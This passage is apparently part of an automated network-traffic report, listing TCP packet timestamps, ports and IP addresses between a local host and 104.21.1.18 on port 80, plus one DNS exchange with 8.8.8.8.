                                                                    Oct 3, 2023 09:55:53.383414030 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.383539915 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.383687973 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.383723021 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.453279018 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.453335047 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.453372002 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.466824055 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.466878891 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.466914892 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.466948032 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.466980934 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467012882 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467045069 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467077017 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467111111 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467143059 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467175007 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467207909 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467241049 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467364073 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467397928 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467428923 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467461109 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467493057 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467607975 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467740059 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467772007 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467804909 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467837095 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467868090 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467900991 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467932940 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467964888 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.467995882 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468029976 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468061924 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468091965 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468126059 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468158007 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468190908 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468221903 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468276024 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468308926 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468343019 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468426943 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468460083 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468558073 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468590975 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468624115 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468655109 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468687057 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468719006 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468750954 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468782902 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468815088 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468847036 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468877077 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468909025 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468905926 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.468907118 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.468943119 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.468976021 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469008923 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469072104 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469113111 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469146967 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469180107 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469182014 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469212055 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469219923 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469244003 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469273090 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469279051 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469309092 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469311953 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469345093 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469377041 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469371080 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469412088 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469436884 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469470024 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469499111 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469502926 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469521046 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469537020 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469569921 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469588041 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469602108 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469635010 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469656944 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469669104 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469686031 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469702005 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469733953 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469760895 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469767094 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469788074 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469799042 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469831944 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469851971 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469863892 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469887972 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469896078 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469928980 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469955921 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469959974 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.469988108 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.469993114 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470024109 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470046997 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470056057 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470072031 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470088959 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470120907 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470149040 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470153093 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470185995 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470199108 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470247030 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470274925 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470309973 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470340967 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470367908 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470372915 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470403910 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470406055 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470483065 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470524073 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470557928 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470582962 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470591068 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470623970 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470643044 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470659018 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470679045 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470691919 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470724106 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470753908 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470757008 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470791101 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470808983 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470824003 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470839024 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470889091 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.470947027 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.470952988 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471004963 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.471014977 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471076965 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471137047 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.471164942 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471199036 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471219063 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.471326113 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471374035 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.471458912 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471517086 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.471519947 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471553087 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471607924 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.471664906 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471703053 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471724987 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.471765995 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471798897 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471823931 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.471829891 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471863985 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.471900940 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.471920967 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.471950054 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472007990 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472042084 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472060919 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472074986 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472089052 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472138882 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472172976 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472192049 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472206116 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472222090 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472266912 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472321033 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472362995 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472436905 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472440958 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472470045 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472501993 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472523928 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472562075 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472568989 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472636938 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472670078 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472697973 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472703934 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472738028 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472769976 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472784042 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472803116 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472820044 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472836018 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472865105 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472914934 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472914934 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472949982 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.472975016 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.472981930 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.473011971 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.473014116 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.473047972 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.477979898 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.478045940 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.563594103 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.563684940 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.563683987 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.563743114 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.564501047 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.564537048 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.564565897 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.564593077 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.564862967 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.564934969 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565100908 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565110922 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565155983 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565202951 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565253019 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565313101 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565373898 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565407038 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565439939 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565445900 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565495968 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565531969 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565565109 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565596104 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565597057 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565620899 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565629959 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565658092 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565685987 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565697908 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565732956 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565763950 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565768957 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565792084 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565835953 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565870047 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565872908 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565903902 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.565927982 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.565949917 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.566009045 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.566023111 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.566114902 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:53.566358089 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.566469908 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.566514969 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.566546917 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.566579103 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567604065 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567639112 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567682981 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567713976 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567744970 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567775965 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567807913 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567838907 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567873001 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567915916 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567946911 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.567977905 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568010092 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568043947 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568057060 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568089008 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568120956 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568152905 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568183899 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568229914 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568262100 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568294048 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568325043 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568356991 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568387985 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568433046 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568463087 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568495035 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568525076 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.568556070 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.569596052 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.573436022 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662564993 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662621021 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662653923 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662688971 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662722111 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662753105 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662785053 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662815094 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662852049 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662884951 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662916899 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662947893 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.662980080 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663011074 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663042068 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663073063 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663130999 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663193941 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663254976 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663290024 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663322926 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663387060 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663419962 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663516045 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:53.663549900 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:58.631050110 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:58.631076097 CEST8049925104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:58.631302118 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:58.633318901 CEST4992580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:56:01.368767977 CEST4985580192.168.2.3104.21.1.18

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 3, 2023 09:54:19.376132011 CEST5059853192.168.2.38.8.8.8
                                                                    Oct 3, 2023 09:54:19.807312965 CEST53505988.8.8.8192.168.2.3
